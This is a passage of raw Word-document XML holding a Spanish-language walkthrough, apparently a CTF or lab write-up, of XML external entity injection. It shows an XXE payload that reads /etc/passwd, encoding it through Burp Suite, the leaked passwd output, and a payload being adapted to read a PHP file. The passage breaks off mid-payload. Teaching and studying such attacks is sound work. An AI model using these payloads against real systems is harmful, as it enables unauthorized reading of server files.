          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC465C8" w14:textId="77777777" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D836C7A" w14:textId="78818C69" w:rsidR="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;reward&gt;test&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3863492F" w14:textId="1147772C" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:r w:rsidRPr="000C007C">
        <w:t xml:space="preserve">Donde </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:t xml:space="preserve"> ser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">á </w:t>
      </w:r>
      <w:r w:rsidR="00C0138E">
        <w:t>la variable para imprimir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el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</w:p>
    <w:p w14:paraId="7B346693" w14:textId="220CC8CC" w:rsidR="001D0525" w:rsidRDefault="00087C7E" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Ahora todo eso lo vamos a mandar como base64. Para este proceso lo puedes hacer desde un editor como también desde la plataforma de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite. En este caso utilizaremos el segundo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6B5DEC" w14:textId="68AD218A" w:rsidR="00087C7E" w:rsidRDefault="00087C7E" w:rsidP="00FA6809">
      <w:r w:rsidRPr="00087C7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54EC97B4" wp14:editId="17C6CD7A">
            <wp:extent cx="5669280" cy="683994"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="65123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32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07222" cy="68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9A84" w14:textId="77777777" w:rsidR="00087C7E" w:rsidRDefault="00087C7E" w:rsidP="00FA6809"/>
    <w:p w14:paraId="50FDFF1A" w14:textId="77777777" w:rsidR="006F6DC0" w:rsidRDefault="006F6DC0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C18AA1" w14:textId="0FF54FAB" w:rsidR="00087C7E" w:rsidRDefault="00087C7E" w:rsidP="00FA6809">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Copiamos toda esa cadena y lo pegamos en la data. Finalmente presionamos CTRL+U para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encodearlo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Y este sería el resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EC8961" w14:textId="2ABF4A0B" w:rsidR="002952EF" w:rsidRDefault="002952EF" w:rsidP="002952EF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002952EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07885EFE" wp14:editId="71F59773">
            <wp:extent cx="4882633" cy="3115376"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="10903314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31430" name="Imagen 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9731" cy="312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52F0" w14:textId="77777777" w:rsidR="006F6DC0" w:rsidRDefault="006F6DC0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082E92F5" w14:textId="3B307A30" w:rsidR="006F6DC0" w:rsidRDefault="006F6DC0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bin:x:2:2:bin:/bin:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sys:x:3:3:sys:/dev:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/games:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> man:x:6:12:man:/var/cache/man:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> lp:x:7:7:lp:/var/spool/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mail:x:8:8:mail:/var/mail:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uucp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxy:x:13:13:proxy:/bin:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> www-data:x:33:33:www-data:/var/www:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> backup:x:34:34:backup:/var/backups:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemd-coredump:x:999:999:systemd Core Dumper:/:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>development:x:1000:1000:Development:/home/development:/bin/bash</w:t>
      </w:r>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> lxd:x:998:100::/var/snap/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/common/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:/bin/false usbmux:x:112:46:usbmux daemon,,,:/var/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usbmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr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sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="552B1FB5" w14:textId="77777777" w:rsidR="006F6DC0" w:rsidRPr="006F6DC0" w:rsidRDefault="006F6DC0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="4"/>
          <w:szCs w:val="4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C5B4CC" w14:textId="5E4AD27A" w:rsidR="006F6DC0" w:rsidRPr="006F6DC0" w:rsidRDefault="006F6DC0">
      <w:r w:rsidRPr="006F6DC0">
        <w:t xml:space="preserve">Tenemos el usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:t>development</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F6DC0">
        <w:t xml:space="preserve"> p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ara poder acceder desde una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F6DC0">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBBF046" w14:textId="3A9719CE" w:rsidR="002952EF" w:rsidRDefault="004B0955" w:rsidP="00FA6809">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Y en efecto, podemos visualizar el contenido de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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C71CB8" w14:textId="0F2BE260" w:rsidR="00173B51" w:rsidRDefault="00173B51" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Adicionalmente, observamos que en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> está haciendo mención </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> un archivo llamado </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_submit.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Entonces a nivel de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> trataremos de leer el documento de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDE728F" w14:textId="77777777" w:rsidR="00173B51" w:rsidRPr="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml  version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDDCC3C" w14:textId="77777777" w:rsidR="00173B51" w:rsidRPr="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM </w:t>
      </w:r>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"file:///etc/passwd"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF11666" w14:textId="77777777" w:rsidR="00173B51" w:rsidRPr="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bugreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF549F5" w14:textId="77777777" w:rsidR="00173B51" w:rsidRPr="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;title&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622FC12" w14:textId="77777777" w:rsidR="00173B51" w:rsidRPr="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572CFDA1" w14:textId="77777777" w:rsidR="00173B51" w:rsidRPr="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF2D4B" w14:textId="740AE114" w:rsidR="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00173B51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;reward&gt;test&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A477A73" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00173B51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA1A51B" w14:textId="517BC511" w:rsidR="00173B51" w:rsidRDefault="00173B51" w:rsidP="00173B51">
      <w:r w:rsidRPr="00173B51">
        <w:t>Lo que está resaltado en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> amarillo es </w:t>
      </w:r>
      <w:r w:rsidR="00D41F0F">
        <w:t xml:space="preserve">lo que vamos a cambiarlo por: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACAB8F" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml  version</w:t>
      </w:r>
